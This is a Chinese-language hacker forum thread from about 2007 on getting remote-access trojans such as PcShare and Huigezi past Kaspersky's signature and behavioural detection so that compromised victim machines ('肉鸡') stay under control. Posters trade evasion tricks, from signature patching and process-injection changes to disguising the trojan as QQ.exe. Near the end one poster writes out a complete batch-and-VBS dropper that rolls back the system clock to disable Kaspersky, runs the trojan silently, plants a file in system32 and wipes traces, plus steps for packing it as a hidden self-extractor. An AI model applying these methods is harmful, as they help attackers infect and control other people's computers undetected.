[讨论]关于pcshare的卡巴免杀
议题作者:hzzlh信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
我已经把pcshare的pchide.sys;pckey.dll;pcclient.dll;pcinit.exe做了免杀,都可以过卡巴。
但是今天突然发现肉鸡不上线了,我就自己做了测试,发现这几个文件还是免杀的,生成客户端也可以执行上线,但是要是进行控制卡巴就会报,而且即使不执行命令,将机子重启之后,卡巴就会将客户端直接卸掉,求助各位高手,这就是卡巴的行为查杀吗?这种情况该怎么做免杀?
补充:我用onlydebug和masm加载这几个文件,再用卡巴内存查杀,仍然查不到病毒。
我在网上查了很多资料,其中有个动画是关于灰鸽子的卡巴行为免杀的,他是用UE把插入的ie进程给改成了别的进程,我也想尝试这种方法,可是搜不到ie(我也是插入ie进程的)。用ollydebug加载之后,再用卡巴查内存,仍然查不到病毒,找不到特征码就没有办法进行免杀。因为不知道是查杀哪个文件,pchide.sys又不能乱改,最好的办法就是找到特征码改特征码。我尝试了很多办法,才来发帖的。另外我想,现在杀软对木马的查杀越来越厉害了,很想大家来讨论一下木马的免杀技术。 过卡巴 的主动防御比较难,不过也有办法,BTW,这儿好象不能讨论这个 没用,就算你过了卡巴主动防,但是交互试保护你不能对肉鸡进行任何操作。
还有为什么LZ是新人可以发帖呢? 笨。你也可以的。發到文章提交区。要是符合发帖的要求才发出来 [quote][b]引用第1楼[i]gpd01[/i]于[i]2007-01-24 10:26[/i]发表的[/b]:
过卡巴 的主动防御比较难,不过也有办法,BTW,这儿好象不能讨论这个[/quote]
是什么办法呢?
有人说可以尝试安装ssm来监视文件调用及中断 [quote][b]引用第2楼[i]skyjay[/i]于[i]2007-01-24 11:51[/i]发表的[/b]:
没用,就算你过了卡巴主动防,但是交互试保护你不能对肉鸡进行任何操作。
还有为什么LZ是新人可以发帖呢?[/quote]
发主题贴的到文章提交那里发。 [s:35] [s:35] 呵呵`
免杀技术因该是允许讨论的```
因为现在很多hack软件都被杀软查杀``
当然hack软件不一定就是干坏事的``
比如说抓包工具WSockExpert,杀软就会杀,导致我们用起来就极其不方便.
呵呵```技术的天堂是允许讨论一切的``!`当然别做坏事就好啦``毕竟hack≠creak
楼主你可以尝试纯汇编免杀哈`````
[s:39] 呵呵,有矛才有盾啊 [s:37] [s:36]
仅限技术讨论。。。
如果特征码找不到怎么汇编免杀呢?因为那些文件都已经是免杀的了啊。。。。 [s:35] [s:35] 用汇编免杀可以过的,我的灰鸽子就是用汇编的,现在还是免杀的 汇编免杀?能过内存查杀吗?
卡巴的主动防御真的很厉害啊,比如远程控制时打开telnet功能,它马上就拦截了,说什么么程序转向之类的 [quote][b]引用第0楼[i]hzzlh[/i]于[i]2007-01-22 17:22[/i]发表的[/b]:
议题作者:hzzlh
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
我已经把pcshare的pchide.sys;pckey.dll;pcclient.dll;pcinit.exe做了免杀,都可以过卡巴。
但是今天突然发现肉鸡不上线了,我就自己做了测试,发现这几个文件还是免杀的,生成客户端也可以执行上线,但是要是进行控制卡巴就会报,而且即使不执行命令,将机子重启之后,卡巴就会将客户端直接卸掉,求助各位高手,这就是卡巴的行为查杀吗?这种情况该怎么做免杀?
.......[/quote]
在你控制的时候必然要调用系统的某些函数,这个调用就是一种行为。
咔吧监视到这种被列入危险系列的行为,就进行阻止或询问用户,故
称为行为查杀!!
具体的怎么过,俺也不清楚,^_^,国内有几个分析了一下,我转载他们的文章在
[url]http://forum.eviloctal.com/read-htm-tid-25716-keyword-.html[/url]
哈哈,好多我都看不懂!
前些时间vxk写了个工具可以击溃咔吧的行为查杀!重启才生效。
个人感觉改特征码,太麻烦了。下边有个思路。
[url]http://netghost.webj.cn/article.asp?id=10[/url] 要做卡巴的免杀,是不是必须要改变计算机的本生的时间.......才能过卡巴的主动防御。 [s:41] 你发过来,我帮你免杀卡巴,可以试一试过主动 [s:39] 现在在测试poison,改了插入的进程后,卡巴确实不会报了,不过在一开始服务端添加自启动的时候卡巴还是会提示操作的。行为查杀。。。。。。。
卡巴主动防御杀手据说可以过卡巴,原理是在木马在运行的时候把卡巴先暂时关闭,之后再开启,但是我没有测试成功,难道是rp问题??。。。。。。
有个想法,干脆弄个自解压,先执行个批处理,批处理就实现把卡巴服务停掉的目的,可是发现net stop根本停不掉卡巴。。。
达人指教。。 [quote][b]引用第12楼[i]白白逍遥[/i]于[i]2007-02-02 11:26[/i]发表的[/b]:
你发过来,我帮你免杀卡巴,可以试一试过主动 [s:39][/quote]
啥子方法呀兄弟,测试成功没!! 卡巴6好象没有类似于启发扫描的模块,对于卡巴的内存杀毒,其实表面过了内存也过了,重点是瑞星的内存杀毒.
要是你以前修改的时候是用填0,那么现在0是没有用的 肉鸡或许不会上线 你在自己电脑上能上线吗?
试试JMP跳区域看看
还有就是 卡巴好象有辅助特征码查杀. [quote][b]引用第13楼[i]hzzlh[/i]于[i]2007-02-02 17:29[/i]发表的[/b]:
现在在测试poison,改了插入的进程后,卡巴确实不会报了,不过在一开始服务端添加自启动的时候卡巴还是会提示操作的。行为查杀。。。。。。。
卡巴主动防御杀手据说可以过卡巴,原理是在木马在运行的时候把卡巴先暂时关闭,之后再开启,但是我没有测试成功,难道是rp问题??。。。。。。
有个想法,干脆弄个自解压,先执行个批处理,批处理就实现把卡巴服务停掉的目的,可是发现net stop根本停不掉卡巴。。。
.......[/quote]
卡巴主动防御杀手
- -!
说穿了
就是把系统时间变下
让卡巴暂时死了
等一切都OK列
在把时间调回正常的 卡巴好象用了行为检测技术^^^
用ADS流44吧 [s:75] [s:75] 无奈的事情 尽量的不要运行到它的监视区域吧 以后靠感染运行 不要启动项什么的好了 不用启动项?
这怎么行
这么着
把QQ.EXE改成QQ2.EXE
木马改成QQ1.EXE
做个批处理
内容为
qq1.exe
qq2.exe
用BAT2EXE把批处理转成EXE程序
改名为QQ.EXE^^^ 主动防御真是让人伤脑筋.............. 让卡巴主动防御失效的代码:
第一个批量代码
date 1980-01-01
date 1980-01-01
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %temp%.\tmp$$$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %temp%.\tmp$$$.vbs
goto Timeout
goto End
:Next
%systemroot%\temp\你的木马名字.exe
copy %systemroot%\temp\tmp.SCR %systemroot%\system32\
fot %%f in (%temp%.\tmp$$$.vbs*) do del %%f
date 2007-2-17(当地时间)
RD /S /Q %systemroot%\temp\
第2个是vbs代码
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C %systemroot%\temp\ser.bat(第一批量文件名字)", 0, TRUE)
把马+BAT文件+VBS文件 压缩成自解压文件 压的时候选高级-自解压选项 解压路径为%systemroot%\temp\ 然后下面解压后运行 写VBS脚本文件的名字 然后选择格式 安静模式选全部隐藏 覆盖方式选全部覆盖 之后 压缩 运行压缩好的文件就会发现 卡巴的主动防御 失效了 呵呵~~! 一个简单的组策略就可以防住所谓的“更改时间让卡巴失效的阴谋”了呵呵 [s:36][img]http://images.rising.com.cn/uploadfiles/20073/3/483382200733203903.jpg[/img] 我的卡巴经常遇到问题要重启产品 这个不知道是什么问题 要是能利用也是一个方法 目前咔吧的主动防御还真的找不到很好的办法
实在不行还是更改时间让卡巴失效吧
总比什么都不做好 卡6改时间
在获得卡6弹出的失效窗口句柄 把他关了
就OK
卡7我还不会 对付卡巴主动防御的方法现在只有修改时间,别的方法都还没有成熟
页:
[1]